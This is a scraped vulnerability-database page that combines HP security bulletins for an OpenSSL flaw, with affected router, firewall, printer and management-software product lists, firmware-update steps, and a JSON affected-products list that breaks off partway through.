20-13 (0235A31W) H3C MSR 20-13 W (0235A31X) H3C MSR 20-15 A (0235A31Q) H3C MSR 20-15 A W (0235A31R) H3C MSR 20-15 I (0235A31N) H3C MSR 20-15 IW (0235A31P) H3C MSR20-12 W (0235A32G)
MSR30 Fix in progress use mitigations JD654A HP MSR30-60 POE Multi-Service Router JD657A HP MSR30-40 Multi-Service Router JD658A HP MSR30-60 Multi-Service Router JD660A HP MSR30-20 POE Multi-Service Router JD661A HP MSR30-40 POE Multi-Service Router JD666A HP MSR30-20 Multi-Service Router JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF232A HP RT-MSR3040-AC-OVS-AS-H3 JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S) H3C MSR 30-20 (0235A19L) H3C MSR 30-20 POE (0235A239) H3C MSR 30-40 (0235A20J) H3C MSR 30-40 POE (0235A25R) H3C MSR 30-60 (0235A20K) H3C MSR 30-60 POE (0235A25S) H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)
MSR30-16 Fix in progress use mitigations JD659A HP MSR30-16 POE Multi-Service Router JD665A HP MSR30-16 Multi-Service Router JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) H3C MSR 30-16 (0235A237) H3C MSR 30-16 POE (0235A238)
MSR30-1X Fix in progress use mitigations JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) H3C RT-MSR3011-AC-OVS-H3 (0235A29L)
MSR50 Fix in progress use mitigations JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR5040-DC-OVS-H3C (0235A20P) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L)
MSR50-G2 Fix in progress use mitigations JD429A HP MSR50 G2 Processor Module JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q) H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)
MSR20 Russian version Fix in progress use mitigations JD663B HP MSR20-21 Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326)
MSR20-1X Russian version Fix in progress use mitigations JD431A HP MSR20-10 Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)
MSR30 Russian version Fix in progress use mitigations JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)
MSR30-1X Russian version Fix in progress use mitigations JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L) H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)
MSR30-16 Russian version Fix in progress use mitigations JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)
MSR50 Russian version Fix in progress use mitigations JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR 50 Processor Module (0231A791) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR5040-DC-OVS-H3C (0235A20P)
MSR50 G2 Russian version Fix in progress use mitigations JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)
MSR9XX Fix in progress use mitigations JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr JG207A HP MSR900-W Router (NA) JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)
MSR9XX Russian version Fix in progress use mitigations JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)
MSR93X Fix in progress use mitigations JG511A HP MSR930 Router JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
MSR93X Russian version Fix in progress use mitigations JG511A HP MSR930 Router JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
MSR1000 Fix in progress use mitigations JG732A HP MSR1003-8 AC Router
MSR2000 Fix in progress use mitigations JG411A HP MSR2003 AC Router
MSR3000 Fix in progress use mitigations JG404A HP MSR3064 Router JG405A HP MSR3044 Router JG406A HP MSR3024 AC Router JG409A HP MSR3012 AC Router JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 Fix in progress use mitigations JG402A HP MSR4080 Router Chassis JG403A HP MSR4060 Router Chassis JG412A HP MSR4000 MPU-100 Main Processing Unit
F5000 Fix in progress use mitigations JG216A HP F5000 Firewall Standalone Chassis JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG)
U200S and CS Fix in progress use mitigations JD268A HP 200-CS UTM Appliance JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N)
U200A and M Fix in progress use mitigations JD274A HP 200-M UTM Appliance JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q)
F1000A and S Fix in progress use mitigations JD270A HP S1000-S VPN Firewall Appliance JD271A HP S1000-A VPN Firewall Appliance JG213A HP F1000-S-EI VPN Firewall Appliance JG214A HP F1000-A-EI VPN Firewall Appliance
SecBlade FW Fix in progress use mitigations JC635A HP 12500 VPN Firewall Module JD245A HP 9500 VPN Firewall Module JD249A HP 10500/7500 Advanced VPN Firewall Mod JD250A HP 6600 Firewall Processing Rtr Module JD251A HP 8800 Firewall Processing Module JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV) H3C S7500E SecBlade VPN Firewall Module (0231A832) H3C SR66 Gigabit Firewall Module (0231A88A) H3C SR88 Firewall Processing Module (0231A88L) H3C S5820 SecBlade VPN Firewall Module (0231A94J)
F1000E Fix in progress use mitigations JD272A HP S1000-E VPN Firewall Appliance
VSR1000 Fix in progress use mitigations JG810AAE HP VSR1001 Virtual Services Router JG811AAE HP VSR1001 Virtual Services Router JG812AAE HP VSR1004 Virtual Services Router JG813AAE HP VSR1008 Virtual Services Router
WX5002/5004 Fix in progress use mitigations JD441A HP 5800 ACM for 64-256 APs JD447B HP WX5002 Access Controller JD448A HP A-WX5004 Access Controller JD448B HP WX5004 Access Controller JD469A HP A-WX5004 (3Com) Access Controller JG261A HP 5800 Access Controller OAA TAA Mod
HP 850/870 Fix in progress use mitigations JG723A HP 870 Unified Wired-WLAN Appliance JG725A HP 870 Unifd Wrd-WLAN TAA Applnc
HP 830 Fix in progress use mitigations JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch
HP 6000 Fix in progress use mitigations JG639A HP 10500/7500 20G Unified Wired-WLAN Mod JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod
M220 Fix in progress use mitigations J9798A HP M220 802.11n AM Access Point J9799A HP M220 802.11n WW Access Point
NGFW Fix in progress use mitigations JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic JC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic JC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic JC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic JC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic
iMC UAM 7.0 Fix in progress use mitigations JD144A HP IMC UAM S/W Module w/200-User License JF388A HP IMC UAM S/W Module w/200-user License JD435A HP IMC EAD Client Software JF388AAE HP IMC UAM S/W Module w/200-user E-LTU JG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU
iMC EAD 7.0 Fix in progress use mitigations JF391AAE HP IMC EAD S/W Module w/200-user E-LTU JG754AAE HP IMC EAD SW Module w/ 50-user E-LTU JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License JF391A HP IMC EAD S/W Module w/200-user License
iMC PLAT 7.0 Fix in progress use mitigations JF377AAE HP IMC Standard Edition Software Platform with 100-node E-LTU JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU JG747AAE HP IMC Standard Software Platform with 50-node E-LTU JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU JD125A HP IMC Standard Edition Software Platform with 100-node License JD815A HP IMC Standard Edition Software Platform with 100-node License JD816A HP A-IMC Standard Edition Software DVD Media JF377A HP IMC Standard Edition Software Platform with 100-node License JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU TJ635AAE HP IMC for ANM 50 node pack SW E-LTU (On HP Softwares CPL not HPNs) JF378AAE HP IMC Enterprise Edition Software Platform with 200-Node E-LTU JG748AAE HP IMC Enterprise Software Platform with 50-node E-LTU JD126A HP A-IMC Enterprise Software Platform with 200-node License JD808A HP A-IMC Enterprise Software Platform with 200-node License JD814A HP A-IMC Enterprise Edition Software DVD Media JF378A HP IMC Enterprise Edition Software Platform with 200-node License JG546AAE HP IMC Basic SW Platform w/50-node E-LTU JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU JG550AAE HP PMM to IMC Bsc WLM Upgr w/150 AP E-LTU JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU JG659AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU JG660AAE HP IMC Smart Connect w / WLAN Manager Virtual Appliance Edition E-LTU JG767AAE HP IMC Smart Connect with Wireless Service Manager Virtual Appliance Software E-LTU
HISTORY Version:1 (rev.1) - 20 June 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlOkrM4ACgkQ4B86/C0qfVn7/QCeK5T1H9dXfVQgIKSr5USqLmvq CtMAnjujH7e5aXfIOvxyyuB0FcSwIWCM =CEL7 -----END PGP SIGNATURE----- . OpenSSL is a 3rd party product that is embedded with some HP printer products. This bulletin notifies HP Printer customers about impacted products. To obtain the updated firmware, go to www.hp.com and follow these steps:
Select "Drivers & Software". Enter the appropriate product name listed in the table below into the search field. Click on "Search". Click on the appropriate product. Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" Note: If the "Cross operating system ..." link is not present, select applicable Windows operating system from the list. Select the appropriate firmware update under "Firmware".
Firmware Updates Table
Product Name Model Number Firmware Revision
HP Color LaserJet CM4540 MFP CC419A, CC420A, CC421A v 2302963_436067 (or higher)
HP Color LaserJet CP5525 CE707A,CE708A,CE709A v 2302963_436070 (or higher)
HP Color LaserJet Enterprise M750 D3L08A, D3L09A, D3L10A v 2302963_436077 (or higher)
HP Color LaserJet M651 CZ255A, CZ256A, CZ257A, CZ258A v 2302963_436073 (or higher)
HP Color LaserJet M680 CZ248A, CZ249A v 2302963_436072 (or higher)
HP Color LaserJet Flow M680 CZ250A, CA251A v 2302963_436072 (or higher)
HP LaserJet Enterprise 500 color MFP M575dn CD644A, CD645A v 2302963_436081 (or higher)
HP LaserJet Enterprise 500 MFP M525f CF116A, CF117A v 2302963_436069 (or higher)
HP LaserJet Enterprise 600 M601 Series CE989A, CE990A v 2302963_436082 (or higher)
HP LaserJet Enterprise 600 M602 Series CE991A, CE992A, CE993A v 2302963_436082 (or higher)
HP LaserJet Enterprise 600 M603 Series CE994A, CE995A, CE996A v 2302963_436082 (or higher)
HP LaserJet Enterprise MFP M630 series B3G84A, B3G85A, B3G86A, J7X28A v 2303714_233000041 (or higher)
HP LaserJet Enterprise 700 color M775 series CC522A, CC523A, CC524A, CF304A v 2302963_436079 (or higher)
HP LaserJet Enterprise 700 M712 series CF235A, CF236A, CF238A v 2302963_436080 (or higher)
HP LaserJet Enterprise 800 color M855 A2W77A, A2W78A, A2W79A v 2302963_436076 (or higher)
HP LaserJet Enterprise 800 color MFP M880 A2W76A, A2W75A, D7P70A, D7P71A v 2302963_436068 (or higher)
HP LaserJet Enterprise Color 500 M551 Series CF081A,CF082A,CF083A v 2302963_436083 (or higher)
HP LaserJet Enterprise color flow MFP M575c CD646A v 2302963_436081 (or higher)
HP LaserJet Enterprise flow M830z MFP CF367A v 2302963_436071 (or higher)
HP LaserJet Enterprise flow MFP M525c CF118A v 2302963_436069 (or higher)
HP LaserJet Enterprise M4555 MFP CE502A,CE503A, CE504A, CE738A v 2302963_436064 (or higher)
HP LaserJet Enterprise M806 CZ244A, CZ245A v 2302963_436075 (or higher)
HP LaserJet Enterprise MFP M725 CF066A, CF067A, CF068A, CF069A v 2302963_436078 (or higher)
HP Scanjet Enterprise 8500 Document Capture Workstation L2717A, L2719A v 2302963_436065 (or higher)
OfficeJet Enterprise Color MFP X585 B5L04A, B5L05A,B5L07A v 2302963_436066 (or higher)
OfficeJet Enterprise Color X555 C2S11A, C2S12A v 2302963_436074 (or higher)
HP Color LaserJet CP3525 CC468A, CC469A, CC470A, CC471A v 06.183.1 (or higher)
HP LaserJet M4345 Multifunction Printer CB425A, CB426A, CB427A, CB428A v 48.306.1 (or higher)
HP LaserJet M5025 Multifunction Printer Q7840A v 48.306.1 (or higher)
HP Color LaserJet CM6040 Multifunction Printer Q3938A, Q3939A v 52.256.1 (or higher)
HP Color LaserJet Enterprise CP4525 CC493A, CC494A, CC495A v 07.164.1 (or higher)
HP Color LaserJet Enterprise CP4025 CC489A, CC490A v 07.164.1 (or higher)
HP LaserJet M5035 Multifunction Printer Q7829A, Q7830A, Q7831A v 48.306.1 (or higher)
HP LaserJet M9050 Multifunction Printer CC395A v 51.256.1 (or higher)
HP LaserJet M9040 Multifunction Printer CC394A v 51.256.1 (or higher)
HP Color LaserJet CM4730 Multifunction Printer CB480A, CB481A, CB482A, CB483A v 50.286.1 (or higher)
HP LaserJet M3035 Multifunction Printer CB414A, CB415A, CC476A, CC477A v 48.306.1 (or higher)
HP 9250c Digital Sender CB472A v 48.293.1 (or higher)
HP LaserJet Enterprise P3015 CE525A,CE526A,CE527A,CE528A,CE595A v 07.186.1 (or higher)
HP LaserJet M3027 Multifunction Printer CB416A, CC479A v 48.306.1 (or higher)
HP LaserJet CM3530 Multifunction Printer CC519A, CC520A v 53.236.1 (or higher)
HP Color LaserJet CP6015 Q3931A, Q3932A, Q3933A, Q3934A, Q3935A v 04.203.1 (or higher)
HP LaserJet P4515 CB514A,CB515A, CB516A, CB517A v 04.213.1 (or higher)
HP Color LaserJet CM6030 Multifunction Printer CE664A, CE665A v 52.256.1 (or higher)
HP LaserJet P4015 CB509A, CB526A, CB511A, CB510A v 04.213.1 (or higher)
HP LaserJet P4014 CB507A, CB506A, CB512A v 04.213.1 (or higher)
HISTORY Version:1 (rev.1) - 22 September 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0445", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jboss enterprise application platform", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "6.2.3" }, { "model": "jboss enterprise web server", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "2.0.1" }, { "model": "jboss enterprise web platform", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "5.2.0" }, { "model": "power", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "7200" }, { "model": "powerlinux 7r2", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "0" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "rox", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "1.16.1" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "application processing engine", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2.0.2" }, { "model": "python", "scope": "lt", "trust": 1.0, "vendor": "python", "version": "3.4.2" }, { "model": "s7-1500", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "1.6" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.2.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.29" }, { "model": "python", "scope": "lt", "trust": 1.0, "vendor": "python", "version": "2.7.8" }, { "model": "server", "scope": "lt", "trust": 1.0, "vendor": "filezilla", "version": "0.9.45" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "storage", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "2.1" }, { "model": "python", "scope": "gte", "trust": 1.0, "vendor": "python", "version": "3.4.0" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "4" }, { "model": "cp1543-1", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "1.1.25" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "python", "scope": "gte", "trust": 1.0, "vendor": "python", "version": "2.7.0" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7100" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7400" }, { "model": "powerlinux 7r1", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "0" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "junos 12.1x44-d20", "scope": null, "trust": 0.9, "vendor": "juniper", "version": null }, { "model": "power express", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "5200" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "10.4" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "11.4" }, { "model": "junos 11.4r9", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "13.3" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "12.3" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7700" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "10.1" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.2" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.5" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "10.0" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7800" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7300" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7500" }, { "model": "junos 10.4s15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "12.1x45" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "12.1" }, { "model": "junos 13.2r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 10.4r15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "11.1" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.3" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 10.4s", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.4" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "12.2" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "11.2" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.1" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "10.2" }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "11.4x27" }, { "model": "junos 11.4r8", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 10.4r16", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.1x45-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.6, "vendor": "juniper", 